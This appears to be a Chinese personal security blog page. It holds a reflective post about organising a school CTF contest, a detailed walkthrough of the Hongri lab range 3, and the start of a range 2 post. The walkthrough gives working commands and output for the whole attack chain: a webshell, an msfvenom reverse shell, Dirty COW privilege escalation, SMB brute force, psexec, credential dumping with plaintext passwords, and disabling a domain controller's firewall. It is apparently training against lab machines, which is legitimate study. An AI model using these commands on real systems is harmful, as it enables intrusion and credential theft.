l1uyun's Blog

办了一场ctf校赛

2024-12-18T20:53:50+08:00

前言

最近办了一场学校的ctf校赛，这也许是我最后一次接触ctf，目前比赛算是结束了，复盘一下比赛，复盘一下我自己。

缘起

办比赛的缘起要从我莫名当上协会负责人说起，九月份去衡阳打攻防，打的过程中，上一届的会长SkyWT在qq上问我要不要当下一任会长，我答应了，回去之后忙完年审材料，换届材料之后，我就成了协会的负责人。（我估计也会这样把协会传下去），这一身份让我与办ctf校赛这一事情产生了内在联系。

|300

另一部分是源自带我去衡阳打攻防的学姐，在衡阳跟我说过这学期她需要办一场ctf比赛，她与学院的老师有过这方面的约定，而我对这位带我去打攻防的学姐是非常感激的。她带我去打攻防，是基于为爱发电的理念，“如果我带你去打了攻防，有了这一次攻防，你之后就有可能去带新人去打，这样我们学校做渗透的就能传下去”，这种热爱，传承的意味在一定程度上影响了我。但是与这种感染相比更多的是对学姐的感激（让我短暂远离了学校这一苦闷的秩序，以及让我中断那段时间的自我内耗）。

再回忆一下让比赛办下去的外部因素，也就是’缘‘。

一方面是学院需要这方面的建设，在建新校区，网安系可能会独立出去啥的，因此给了比较充足的预算支持，

另一个外部因素是跟朋友的闲聊，聊到我们学校ctf这方面发展的不行，没什么氛围，跟那些强ctf战队的学校比不了，之后是一段不怎么愉快的交流（回忆那次闲聊，我只是知道是不怎么愉快的，就跟我知道1+1=2一样，只是概念上的知道有这一回事），我并不认同‘我身为会长，就最有责任最有义务去建设这玩意’，我当上会长并不是因为有一群热爱安全，热爱ctf，一起打比赛的伙伴，并不是有一个真实的信安协会，协会只在学校的记录中还存在而已，在我的认知中，我只是莫名奇妙就当上了会长（我只是莫名奇妙就来到了这个世界）

‘我’并不是一个有什么领导特质的人，或者说，我并不是一个主动的，积极的，直接活着的人，我没有很强的自我感（这些否定性的特质是我能够活到现在的前提），我的自我感直到高二才显现出来，当时我将那种强烈的“我需要做一些事情，我能够做一些事情”的感觉，称作觉醒。

大多数时间，是世界在向我展开，是生活在经历我，我只是莫名其妙的经历那些，莫名奇妙的就成为了我，这与我的早期经历有关，与心盲症有关。

进入大学后，我做了一些努力，积极地说，或许改变了5%。按照修行的说法，我身上的习气依然很难消除，也许每天只有20分钟，我能够保持积极的，主动的，觉察的心态，在修行，而剩下的23小时40分钟都在复习过去旧有的习惯，强化旧有的思维模式，都在依照过去的习性造作新的业，在反向修行。

回到那次闲聊，闲聊中，我莫名成了最有责任要办一场比赛，来提升学校ctf氛围的的人，这种‘因为我是会长，所以我需要…’的说法对我来说是荒谬的，如果这一说法是产生于内部，有可能会鼓动到我（如果我不小心相信了我的念头）。（类比这样的说法，我们都相信自己是理性的，但是如果别人对你说，‘你要理性一点’，你会以非理性的方式应对，你的心理机制会让你对此反对的，如果你认同了，那你在这场语言权力斗争中就输了..）

我是一个被动的人，既然朋友都这么说了，那我就去推进一下这件事情。跟我闲聊的朋友并不知道协会的学姐跟我说过，这学期她需要办一场校赛这一信息。（也许是并不相信这一说法，不过无所谓怎么形容了，反正我回忆不起来过去发生的事情的细节）在我的视角中，推进办比赛这件事情最直接的方式就是去联系一下学姐。

在我联系学姐之后，这场比赛的因缘就和合了，如果没有什么更大的外部事件发生，就一定会办了。

类比一颗已经接近临界点的水煮蛋，哪怕在此刻促成煮鸡蛋的一些外界条件改变了，装鸡蛋的容器消失了，提供热量的火灭了，把鸡蛋放到容器里面的人暴毙了….余热也会让煮鸡蛋这一事件彻底完成，这颗鸡蛋注定会成熟。（这是我对因缘和合这一说法最早的印象）

赛前

办一场比赛，最麻烦的事情都在赛前。

方案

由于拿了学院的预算，所以什么都需要审核。

拿着22年校赛的方案，更改内容，添加一点点细节，经过几个版本的迭代，勉强弄出来一个像样的方案。

部署平台

最开始是打算使用超算中心的服务器，由于没有办比赛的经验，不清楚要租一个什么配置的服务器，在询问了探姬师傅以及结合超算中心的价格表，准备租个2核4g，20Mbps带宽的服务器，但是走完申请流程，拿到服务器之后，发现没有给公网ip，也没有给学校内网的ip，以及还需要签一个安全承诺书，不能扫描服务器，不能部署有漏洞的服务啥的，但是我们是办ctf比赛….

最终选择在腾讯云上租服务器，配合双十一的卷，不到四百块钱租了一个月的轻量应用服务器。8核16g，18Mbps，月流量3500G，比赛只用了一点点，大概是3-5%的性能

部署平台是使用GZCTF这一开源平台，使用docker部署

出题

原本定了六个方向的题，web，pwn，reverse，crypto，misc，osint，kery学长还弄了一道ai题

由于是校内的新生赛，所以都是出的easy难度的题

我主要弄了web，crypto方向的题，web方向，全程使用的php出的题，因此web方向出题并没有花多少时间。

crypto方向，是因为没人学，我也没学过，就简单出了两个编码和一个easy_rsa。

预热

由于学院那边突然就把推文给发出去了，那时候离宣讲会都还有两个星期，导致整个比赛莫名的启动了，于是kery学长建议弄几个预热题，让大家熟悉一下，也让我们主办方熟悉和测试一下比赛平台。

当时我负责的题是已经出完了，我就直接从我出的web题里面丢了几道在预热赛里面。

宣讲会

宣讲会，我在消极应对，最开始是不知道要演示些啥，后面弄了预热，那就讲讲预热题吧，我也没做什么准备，只是在宣讲会开始前一个多小时，在宿舍练习了一遍，讲了半个多小时，然后就直接过去了。

原本预期中，我是坐在下面，使用腾讯会议投屏，来演示的，但是由于学姐主持的时候我和她都没有反应过来，没有意识到只需要退出她电脑上的ppt，换到腾讯会议的界面就行，我就莫名奇妙的拿着电脑上去了。

让我站在前面，面对其他人讲，我很难讲好，一方面是缺乏练习，缺乏经历，另一方面是，对于这些内容，我并没有很强的表达分享的欲望，缺乏内在动力，所以我很难克服当众表达面临的本能阻力。

想象一下，几百万年以前，我还是野人的时候，走在路上，突然一束光照向我的眼睛，并且前面还有很多生物盯着我，有很多双眼睛看着我。这种情况下，我本能的就会启动战斗模式，血液流向四肢，握拳准备战斗，或者启动逃跑模式，双脚开始绷紧，准备逃跑。这时最不需要的就是思考，血液会从大脑流向其他地方，我的大脑就一片空白了。

赛中

比赛从周六的上午九点到周天的下午五点。

day1

第一天全程在当人工bot，播报比赛的一血二血三血情况，比赛开始前面半个小时，还在担心没人打，没人拿一血，不过比赛刚开始几分钟就有人解出题了，不得不说，这几个新生确实nb，不过也与大模型有关吧，我没有去测试，但是估计所有的题，都能使用chatgpt解决

第一天结束的时候，大部分题都被解决的差不多了。

day2

第二天一觉醒来，有个学长半夜屠榜了

以及发现有个校外✌ak了，从周六下午五点，打到周天早上七点，太肝了。

赛后

做题情况

所有的题目都被做出来了。

还有一些非预期解，例如ai那道题，找个在线的加噪点网站就能解决，或者干脆使用win自带的画图，在图像里面随便画几笔就能通过。

||550

总共43个人答了签到题。。。

作弊情况

比赛过程中发现有提交其他人flag的，我们大部分题目都是使用的动态flag，能在后台看见哪只队伍提交了哪只队伍的flag。发现有这种情况之后，我们发了个警告，但是没起到什么作用，马上这两只队伍又出现了互相提交flag的情况，不过最后这两只队伍也没有提交wp，大概只是来玩一下的。

审wp

做出签到题的有43个人，提交wp的，只有16个，算上群里的毕业学长发的wp，总共只有18个wp，所以审wp的工作很快就完成了，没啥内容，而且除了reverse和pwn方向，其他方向都很直接，并没有很长的链子。

而我们pwn方向的出题人，倒是发现了一些疑点，我们开会之后，决定抽空找他们线下答辩一下。但是后面出了意外情况，就按照意外情况的处理方式去处理了。

官方wp

原本是有计划出官方wp的，但是遇到了期末考试，我也就懒得弄了，正好学长们在群里发了wp，就封他们为官方wp了。

看了一下他们的wp，思路上差不了多少，毕竟都是easy题。

我出的misc方向的《网络鲨鱼》，没人尝试去连接那个mysql数据库，出题的时候没有想清楚，觉得是新生赛，就在后面又给了一个base64编码的flag，导致这道题跟另外一道流量分析的题很相似了。

|500

意外事件

虽然过了交wp的时间，但是之后的一两天内我还是有在翻看邮箱，结果在垃圾箱里面发现了一封异常的邮件，点进去一看是举报…..还好我有翻垃圾箱的习惯

这种事情只能上报了，按照指示，找了新生里面的第一名第二名谈话，两个新生态度都很好，都没有不承认，最终也是处理完了这件意外事件，取消了这两人的pwn方向成绩。

公示成绩

基本上是认真参与了就有奖，新生赛道，14个wp，12个奖。（他们这500赚的轻松🙄，我在衡阳，7天时间，每天9小时，最终还是拿了奖才能有500…….）

高年级赛道，只有四个wp，但是有十个礼品，最终弄成大礼包送出去了。

归档

在正式比赛结束之后，把比赛平台数据，题目源码，以及整个比赛用到的文档都归档了一下，放到祖传材料里面，留给下一任会长了。

l1uyun

草台班子

亲自办一场比赛，让我对草台班子这一说法有了经验性的理解。在这之前，我只是听马督工讲过这一说法，只是概念上知道。

办完这场比赛之后，才理解了组织，秩序背后的松散拼凑、粗制滥造，这有利于我进一步对各种叙事祛魅

小组作业？

办这场比赛，跟完成一个课程小组作业，我没有感到有什么区别，只是时间更长，事情更多的小组作业。我并没有感知到什么团队的氛围，只是拼凑起来，来完成这样一个与ctf相关的任务，彼此之间并没有深度的联系。我并没有感受到作为一个团队来完成一件事情的感觉。

正见，正思维

消极/积极一点来看，我应该如实观照现在的氛围，而不是产生幻想，产生’应该是什么样’的念头。现在的氛围就是现在的氛围，没有’应该是什么样的氛围’。现在的氛围背后也是无数因缘和合导致的，是无常导致的。所有的“应该是什么样”都是来源于我对无常的不明白，都是我在尝试掌控我不能掌控的东西。

积极/消极一点来看，我可以拥有主动性，可以去促进积极的事情发生。无常是坏事，也是好事。我需要并且能够去促进积极的因缘产生，这里的"需要"是因为我还有世俗的欲望，“能够"是指只需要变得比之前好5%就行，《5%的改变》是容易的，是我可以实现的。

引用

如何办好一场校内 CTF 赛 _ 写在 2024 网络攻防课程结课后

sec

2024-10-27T08:37:45+08:00

红日靶场3

2024-10-07T21:20:16+08:00

前言

得加快红日靶场的进度了

红日靶场3

搭建环境

这个靶场只有一台web服务器暴露在外网中

外网网段 192.168.3.1/24
攻击机 parrot 192.168.3.101
攻击机 wsl  192.168.3.100
攻击机 win  192.168.3.99
web-centos 192.168.3.3

内网网段
192.168.93.1/24

五台靶机都是配置了only-host网卡,除了centos额外有一个nat网卡,来与外网通信. 启动centos靶机之后,需要service network restart

[!INFO] 配完环境之后,发现忘了弄快照了,可能不会在一个完整的时间内完成,所以….重新解压一下,改完网卡后,先弄下快照

外网

访问192.168.3.3

信息收集

joomla cms

这个cms之前打靶机的时候遇见过

在README.txt中发现了版本信息(在http://192.168.3.3/administrator/manifests/files/joomla.xml中也有)

在exploit-db中查找一下,先看看两个sql注入,RealEstateManager和VehicleManager组件的,但是这台机器,这两个组件都没有

后台弱口令登录失败,跑一下爆破脚本

继续找一下nday,尝试了一下,没啥进展

数据库凭据泄露

回到目录扫描御剑扫一下

phpinfo

电脑卡起来了,御剑崩了,换成dirsearch,扫到了下面这个文件 http://192.168.3.3/configuration.php~ 里面有数据库的账号密码

	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'testuser';
	public $password = 'cvcvgjASD!@';
	public $db = 'joomla';
	public $dbprefix = 'am2zu_';

navicat连一下

admin
$2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy

administrator
$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2

bcrypt加密

sql添加管理员

没跑出来,添加一个新用户算了

INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
    'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

然后使用admin2:secret登录进入后台

后台模板getshell

上传webshell,这里生成的是蚁剑的

|500

修改error.php,并保存

路径是http://192.168.3.3/templates/beez3/error.php

antsword

连上去了

加载插件之后执行命令

存在内网ip 192.168.93.120

传到msf里面吧

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.3.100 LPORT=4444 -f elf -o shell.elf

没传成功….尝试了很多反弹shell的操作,但是都没有弹成功最后在tmp目录下发现了凭据,前期已经知道了ssh是开放的,连上去

ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa wwwuser@192.168.3.3

wwwuser_123Aqx

ssh连上去之后上linpeas脚本,看到了这个nginx配置文件,明白是什么意思了,我拿到的webshell是在内网的192.168.93.120机器上面,而我现在的靶机的内网ip是192.168.93.100,所以我反弹不了web机器的shell回来,有公网ip的这台nginx机器是反向代理了内网的web机器

-rw-r--r--. 1 root root 1032 Oct  6 20:09 /etc/nginx/nginx.conf
user  nginx;
worker_processes  1;
error_log  /var/log/nginx/error.log warn;
pid        /var/run/nginx.pid;
events {
    worker_connections  1024;
}
http {
  server {
        listen  80;
        server_name  localhost;
        location / {
         proxy_pass  http://192.168.93.120;
              proxy_set_header        Host $host;
              proxy_connect_timeout   90;
              proxy_send_timeout      90;
              proxy_read_timeout      90;
              proxy_buffer_size       4k;
              proxy_buffers           4 32k;
              proxy_busy_buffers_size 64k;
              proxy_temp_file_write_size 64k;
              proxy_redirect          off;
}
}
}
stream  {

upstream proxy_name {

    server 192.168.93.120:3306;

}
server {

    listen 3306;

    proxy_pass proxy_name;

}

提权

接下来要对内网的机器进一步渗透,这台公网机器需要作为跳板机,先得拿下root

尝试一下脏牛

上传.c文件,将文件里面的用户名改成root

[wwwuser@localhost tmp]$ wget 192.168.3.100/dirty.c
--2019-10-06 22:57:45--  http://192.168.3.100/dirty.c
Connecting to 192.168.3.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4807 (4.7K) [text/x-csrc]
Saving to: “dirty.c”

100%[================================================>] 4,807       --.-K/s   in 0s      

2019-10-06 22:57:45 (11.1 MB/s) - “dirty.c” saved [4807/4807]

[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls -al ./dirty
-rwxrwxr-x. 1 wwwuser wwwuser 12056 Oct  6 22:57 ./dirty
[wwwuser@localhost tmp]$ ./dirty 
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
root:roNJMEIcMPy4.:0:0:pwned:/root:/bin/bash

mmap: 7f6fb884c000
[wwwuser@localhost tmp]$ su root
Password: 
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

拿下root,将shell传到msf中,msfvenom

搭建socks隧道

参考之前在红日1里面的笔记红日靶场1-win域

run post/multi/manage/autoroute background use auxiliary/server/socks_proxy run 使用jobs即可查看 msf6 auxiliary(server/socks_proxy) > jobs Jobs Id Name Payload Payload opts

0 Auxiliary: server/socks_proxy

内网

内网存活探测

☁  workspace  sudo proxychains4 nmap -sn -PE 192.168.93.1/24
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-08 17:05 CST
Nmap scan report for 192.168.93.1
Host is up (0.0016s latency).
Nmap scan report for 192.168.93.10
Host is up (0.0018s latency).
Nmap scan report for 192.168.93.20
Host is up (0.0033s latency).
Nmap scan report for 192.168.93.30
Host is up (0.0015s latency).
Nmap scan report for 192.168.93.100
Host is up (0.0017s latency).
Nmap scan report for 192.168.93.120
Host is up (0.0050s latency).
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.56 seconds

内网web机器

扫一下那台内网web机器,9191端口应该是我刚刚用蚁剑的后渗透插件启动的bind-shell

☁  workspace  sudo proxychains4 nmap -Pn -sT 192.168.93.120 -p22,80,3306,9191 --min-rate=5000
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-08 17:12 CST
Nmap scan report for 192.168.93.120
Host is up (0.031s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
3306/tcp open   mysql
9191/tcp closed sun-as-jpda

现在再回到蚁剑的后渗透模块,设置代理,使用bind-shell,传回msf

linux的两台机器拿到了

还剩下三台win机器

192.168.93.10
192.168.93.20
192.168.93.30

信息收集

这里我配完proxifier之后,在浏览器里面访问了一下,发现20机器的80端口开放,先扫一下这台

复习一下awk,提取nmap的扫描结果中的端口号
awk -F '/'  -v ORS=',' '{print $1}' aaa | sed 's/,$//'

win2008

☁  workspace  sudo proxychains4 nmap -Pn -sT 192.168.93.20 -p80,135,139,445,1433,2383,47001,49152,49153,49154,49155,49156,49158  -A  --min-rate=10000
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-08 18:56 CST
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 18:59 (0:01:22 remaining)
Nmap scan report for 192.168.93.20
Host is up (0.0079s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn?
445/tcp   open  microsoft-ds Windows Server (R) 2008 Datacenter 6003 Service Pack 2 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2008 10.00.1600.00; RTM
| ms-sql-info:
|   192.168.93.20\MSSQLSERVER:
|     Instance name: MSSQLSERVER
|     Version:
|       name: Microsoft SQL Server 2008 RTM
|       number: 10.00.1600.00
|       Product: Microsoft SQL Server 2008
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| ms-sql-ntlm-info:
|   192.168.93.20\MSSQLSERVER:
|     Target_Name: TEST
|     NetBIOS_Domain_Name: TEST
|     NetBIOS_Computer_Name: WIN2008
|     DNS_Domain_Name: test.org
|     DNS_Computer_Name: win2008.test.org
|     DNS_Tree_Name: test.org
|_    Product_Version: 6.0.6003
|_ssl-date: 2024-10-08T11:00:20+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-12-15T05:29:23
|_Not valid after:  2049-12-15T05:29:23
2383/tcp  open  ms-olap4?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :        
SF-Port139-TCP:V=7.94SVN%I=7%D=10/8%Time=67050FFA%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,5,"\x83\0\0\x01\x8f");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN2008, NetBIOS user: , NetBIOS MAC: 00:0c:29:ab:44:ec (VMware)
|_clock-skew: mean: -1h36m00s, deviation: 3h34m37s, median: -1s
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Datacenter 6003 Service Pack 2 (Windows Server (R) 2008 Datacenter 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp2
|   Computer name: win2008
|   NetBIOS computer name: WIN2008\x00
|   Domain name: test.org
|   Forest name: test.org
|   FQDN: win2008.test.org
|_  System time: 2024-10-08T18:58:24+08:00
| smb2-time:
|_  start_date: 2019-12-14T11:49:34
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:0:2:
|_    Message signing enabled but not required

TRACEROUTE (using proto 1/icmp)
HOP RTT     ADDRESS
1   0.84 ms 192.168.3.2
2   1.19 ms 192.168.93.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.63 seconds

等其他两个nmap扫描的时候,才发现我忘了上内网神器fscan了….

[root@localhost tmp]# ./fscan  -h 192.168.93.10
start infoscan
192.168.93.10:445 open
192.168.93.10:139 open
192.168.93.10:135 open
192.168.93.10:88 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo 
[*]192.168.93.10
   [->]WIN-8GA56TNV3MV
   [->]192.168.93.10
[*] OsInfo 192.168.93.10        (Windows Server 2012 R2 Datacenter 9600)
[*] NetBios 192.168.93.10   [+] DC:WIN-8GA56TNV3MV.test.org      Windows Server 2012 R2 Datacenter 9600

[root@localhost tmp]# ./fscan  -h 192.168.93.20
start infoscan
192.168.93.20:1433 open
192.168.93.20:445 open
192.168.93.20:139 open
192.168.93.20:135 open
192.168.93.20:80 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]192.168.93.20
   [->]win2008
   [->]192.168.93.20
[*] WebTitle http://192.168.93.20      code:404 len:315    title:Not Found
[*] NetBios 192.168.93.20   win2008.test.org                    Windows Server (R) 2008 Datacenter 6003 Service Pack 2
[*] OsInfo 192.168.93.20        (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
已完成 5/5
[*] 扫描结束,耗时: 1.224541199s

[root@localhost tmp]# ./fscan  -h 192.168.93.30
start infoscan
192.168.93.30:445 open
192.168.93.30:139 open
192.168.93.30:135 open
[*] alive ports len is: 3
start vulscan
[*] NetInfo 
[*]192.168.93.30
   [->]win7
   [->]192.168.93.30
[*] OsInfo 192.168.93.30        (Windows 7 Professional 7601 Service Pack 1)
已完成 3/3

另外两台机器最终放弃掉nmap的扫描了,太慢了

总结一下

test.org域内
192.168.93.10 win2012 DC
192.168.93.20 win2008 
另外有一台机器不在TEST域内
192.168.93.30 win7

smb凭据爆破

到这里为止,横向移动的思路卡住了,去看了一下网上的各种解法,最常见的就是爆破smb的凭据了….我选的几个字典都没有这个密码,手动添加一下…..

sed -i '100i 123qwe!ASD' rockyou.txt

administrator:123qwe!ASD

附上其他师傅的横向思路

1、mssql要是拿到高权限（sa账号权限）可以尝试通过mssql写 shell 然后提权。
2、在进行横向移动时，内网设备扫不出来其他漏洞，只能通过 SMB 爆破或者 NTLM Relay 攻击，SMB 爆破比较碰运气，在实际过程中可以通过收集公司及管理员信息生成对应字典；NTLM Relay 攻击类似社工钓鱼，遇到安全意识不高的管理员才有可能成功，并且在内网环境中安装Python和对应的库也是比较麻烦的，可以考虑使用 conda 等创建虚拟环境，然后一起打包上传到对应靶机，但是相应的环境配置也是比较容易出问题。

psexec拿shell

使用msf的windows/smb/psexec模块,拿到20,30机器的shell

set rhosts 192.168.93.20,30
rhosts => 192.168.93.20,30
msf6 exploit(windows/smb/psexec) > run
[*] Exploiting target 192.168.93.20

[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (201798 bytes) to 192.168.93.20
[*] Meterpreter session 7 opened (192.168.3.100:39039 -> 192.168.93.20:4444) at 2024-10-08 19:47:02 +0800
[*] Session 7 created in the background.
[*] Exploiting target 192.168.93.30
[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (201798 bytes) to 192.168.93.30
[*] Meterpreter session 8 opened (192.168.3.100:42267 -> 192.168.93.30:4444) at 2024-10-08 19:47:07 +0800
[*] Session 8 created in the background.
msf6 exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  7         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN2008  192.168.3.100:39039 -> 192.168.93.20:4444 (192.168.93.20)
  8         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN7     192.168.3.100:42267 -> 192.168.93.30:4444 (192.168.93.30)

kiwi模块获取DC凭据

还剩下一个域控机器,先进入win2008的会话中,加载一下kiwi

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain   LM                                NTLM                              SHA1
--------       ------   --                                ----                              ----
Administrator  TEST     fc5d63d71569f04399b419bc76e2eb34  18edd0cc3227be3bf61ce198835a1d97  0f058e319f079c15fe3449bbeffc086cfa4d231e
Administrator  WIN2008  ae946ec6f4ca785b93371dee1d5ee7e6  31c1794c5aa8547c87a8bcd0324b8337  128c0272959b85b330090611169d07d85cb6bd0b
WIN2008$       TEST                                       c47b1f47431b259861e615472864c698  5a09ade7dca624916c39473fd609c22302dd33bc

wdigest credentials
===================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  TEST     zxcASDqw123!!
Administrator  WIN2008  123qwe!ASD
WIN2008$       TEST     94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17   
                        92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d   
                        c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9   
                        2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22   
                        80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52   
                        5e b8 37 30 b7

tspkg credentials
=================

Username       Domain   Password
--------       ------   --------
Administrator  TEST     zxcASDqw123!!
Administrator  WIN2008  123qwe!ASD

kerberos credentials
====================

Username       Domain    Password
--------       ------    --------
(null)         (null)    (null)
Administrator  TEST.ORG  zxcASDqw123!!
Administrator  WIN2008   123qwe!ASD
win2008$       TEST.ORG  94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17  
                          92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0  
                         d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72   
                         e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d  
                          22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c  
                         0 52 5e b8 37 30 b7


meterpreter >

接下来就是尝试登录域控

关闭域控防火墙并拿到session

这里先使用win7的session来关闭win2012域控机器的防火墙

net use \\192.168.93.10\ipc$ "zxcASDqw123!!" /user:"Administrator"

sc \\192.168.93.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"

sc \\192.168.93.10 start unablefirewall

然后在使用msf的psexec模块拿shell

发现还有不少东西要学,win和linux的免杀,win域渗透,权限维持….我还要继续学下去吗,已经沉没的比较多了

最后偷一张拓扑图

引用

https://blog.csdn.net/qq_47289634/article/details/132021341

https://blog.csdn.net/2301_76227305/article/details/139067562

https://www.bilibili.com/read/cv33395770/

红日靶场2_win域

2024-09-28T11:10:12+08:00

前言

环境和红日1的环境搭建差不多，不过这次给三台机器分别是域控、web服务器、个人PC机，与红日1不同的是这里将域管换成了个人PC机，因此我们的一些操作也会有所不同

红日靶场2_win域

搭建环境

administrator
1qaz@WSX
默认密码都是1qaz@WSX

这里需要模拟内网环境,所以需要弄一个内网网卡

创建一个vmnet2

然后把三台机器的网卡2都改成这个vmnet2就行了

DC机器不需要做什么处理,改完网卡直接启动就行

